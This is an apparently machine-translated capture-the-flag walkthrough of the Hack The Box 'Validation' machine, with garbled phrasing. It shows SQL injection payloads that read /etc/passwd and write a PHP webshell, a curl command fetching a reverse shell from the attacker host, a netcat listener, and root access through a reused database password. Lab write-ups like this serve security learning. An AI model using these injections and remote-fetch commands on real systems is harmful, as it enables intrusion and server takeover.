disclaimer

The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purposes. I am not responsible for any consequences arising therefrom, nor for any misuse or damage caused.

Service to detect

Chrysene ─(root💀kali)-[~/ HTB] ├ ─# nmap-sv-pn 10.10.11.116-p-host discovery disabled (-pn). All addresses will be marked 'Up' and scan times will be slower. Starting Nmap 7.91 (https://nmap.org) at 2021-11-29 03:48 EST Nmap scan report for slower 10.10.11.116 Host is up (latency). Not shown: 65522 Closed ports PORT STATE SERVICE VERSION 22/ TCP open SSH OpenSSH 8.2 P1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; Protocol 2.0) 80/ TCP Open HTTP Apache HTTPD 2.4.48 ((Debian)) 4566/ TCP Open HTTP nginx 5000/ TCP filtered UPNP 5001/ TCP filtered commplex-link 5002/tcp filtered rfe 5003/tcp filtered filemaker 5004/tcp filtered avt-profile-1 5005/tcp filtered avt-profile-2 5006/tcp filtered wsm-server 5007/tcp filtered wsm-server-ssl 5008/tcp filtered synapsis-edge 8080/tcp open http nginx Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) Scanned in 1102.01 secondsCopy the code

Directory of blasting

┌ ─ ─ (root 💀 kali) - ~ / dirsearch └ ─ # python3 dirsearch. Py - e * t - 100 - u _ | http://10.10.11.116. _ _ _ _ _ _ | _ v0.4.2 (_ | | | _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492 Output File: / root/dirsearch/reports / 10.10.11.116 / _21-11-29 _04-17-51. TXT the Error Log: / root/dirsearch _04 / logs/errors - 21-11-29-17-51. The log Target: http://10.10.11.116/ [04:17:52] Starting: [04:18:57] 200-0b - /config.php [04:19:00] 301-310b - / CSS -> http://10.10.11.116/css/ [04:19:16] 200-16KB - /index.php [04:19:17] 200 - 16KB - /index.php/login/ [04:19:18] 403 - 277B - /js/Copy the code

Just a few files. Nothing special in the web source code

The index page requires you to enter a name, and clicking OK will take you to another page that displays the name we just entered, which is probably through the database

So will there be SQL injection?

SQL injection

Use burp to grab the package of the index.php page and save it to a data file

Chrysene ─(root💀kali)-[~/ HTB /Validation] ├ ─# cat data POST /index.php Mozilla / 5.0 (X11; Linux x86_64; The rv: 78.0) Gecko / 20100101 Firefox 78.0 / Accept: text/HTML, application/XHTML + XML, application/XML. Q = 0.9, image/webp, * / *; Q = 0.8 Accept - Language: en - US, en. Q =0.5 accept-encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 27 Origin: http://10.10.11.116 Connection: close Referer: http://10.10.11.116/ upgrade-insecure -Requests: 1 username=max&country=BrazilCopy the code

Sqlmap try running:

─ ─ (root 💀 kali) - ~ / HTB/Validation └ ─ # sqlmap - r data - batch - level = 5 - risk = 3 ___ __H__ ___ ___ [] _____ _____ _____ {1.5.2 # stable} | -- - |. [(]. | '. | | | ___ | _ [(] _ _ - | | _ | __, | _ | | _ | V... |_| http://sqlmap.org [!]  legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 09:36:41 /2021-11-29/ [09:36:41] [INFO] parsing HTTP request from 'data' [09:36:41] [INFO] Testing the connection to the target URL got a 302 redirect to 'http://10.10.11.116:80/account.php'. Do you want to follow? [Y/n] Y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y [09:36:42] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s) [09:36:42] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--proxy', '--proxy-file'...) you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge  them in further requests? [Y/n] Y [09:36:44] [CRITICAL] unable to connect to the target URL [09:36:44] [INFO] testing if the target URL content is  stable [09:36:45] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s) [09:36:48] [CRITICAL] unable to connect to the target URL [09:36:48] [WARNING] POST parameter 'username' does not appear to be dynamic [09:36:49] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s) [09:36:50] [CRITICAL] unable to connect to the target URL [09:36:50] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable [09:36:50] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s) there seems to be a continuous problem with connection to the target. Are you sure that you want to continue? [y/N] N [09:36:51] [WARNING] your sqlmap version is outdated [*] ending @ 09:36:51 /2021-11-29/Copy the code

Failed…

The payload is used for SQL injection

username=max&country=Andorra’

The result was wrong

Fatal error: Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33 Stack trace: #0 {main} thrown in /var/www/html/account.php on line 33

The quotation marks are executed as SQL.

Get the mysql version

username=max&country=Andorra’ union select @@version — –

Returns: 10.5.11 MariaDB – 1

Get the current database name:

username=max&country=Andorra’ union select database() — –

Returns: registration

Gets all the tables of the current library, all the table-owned libraries, the number of rows for the table, and the functional comments for the table

username=max&country=Andorra’ union select concat( table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)) from information_schema.tables where table_schema=database() — –

Return: Registration 30

Database user: uhc@localhost Database installation path: /var/lib/mysql/

Check the/etc/passwd

username=max&country=Andorra’ union select load_file(“/etc/passwd”)– –

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd  Resolver,,,:/run/systemd:/usr/sbin/nologin mysql:x:104:105:MySQL Server,,,:/nonexistent:/bin/false messagebus:x:105:106::/nonexistent:/usr/sbin/nologin sshd:x:106:65534::/run/sshd:/usr/sbin/nologinCopy the code

Surprisingly, there are no ordinary users who can log in directly through SSH

Username =max&country=Andorra’ union select ”
” into outfile “/var/www/html/exp.php” — –

Phpinfo is displayed successfully.

Write webshell to target machine (I did a lot of try here…) username=max&country=Andorra’ union select ”
” into outfile “/var/www/html/exp.php”; — –

We use IP} {/ exp. PHP? CMD = id trigger webshell

Returns:

uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)
Copy the code

IP in {} / exp. PHP? CMD =cat /home/htb/user.txt

Make a serious Webshell

But this shell is really inconvenient, so we use the payload below to get an interactive shell

{IP}/exp.php? CMD = curl % 20 http://10.10.14.15:8000/reverse-shell.php%20 – o. / shell. PHP

Then access the specified file to get the rebound shell

{IP}//shell.php

Chrysene ─(root💀kali)-[~/ HTB /Validation] ├ ─# nC-lnVP 462 listening on [any] 462... Connect to [10.10.14.15] from (UNKNOWN) [10.10.11.116] 48802 Linux Validation 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15  19:09:17 UTC 2021 x86_64 GNU/Linux 16:55:32 up 3:52, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM login@idle JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-dataCopy the code

Right to mention

Transmit LINpea to target aircraft

The curl http://10.10.14.15:8000/linpeas.sh – o/TMP/linpeas. Sh

I found that there is a cap_chown ability that can be used to lift weights, but I did not know how to use it

Go to the web site to see the configuration file and try su root.

$ cat config.php <? The PHP $servername = "127.0.0.1"; $username = "uhc"; $password = "{this is the password}"; $dbname = "registration"; $conn = new mysqli($servername, $username, $password, $dbname); ? > $su Password: {id uid=0(root) gid=0(root) groups=0(root) cat /root/root. TXT {Copy the code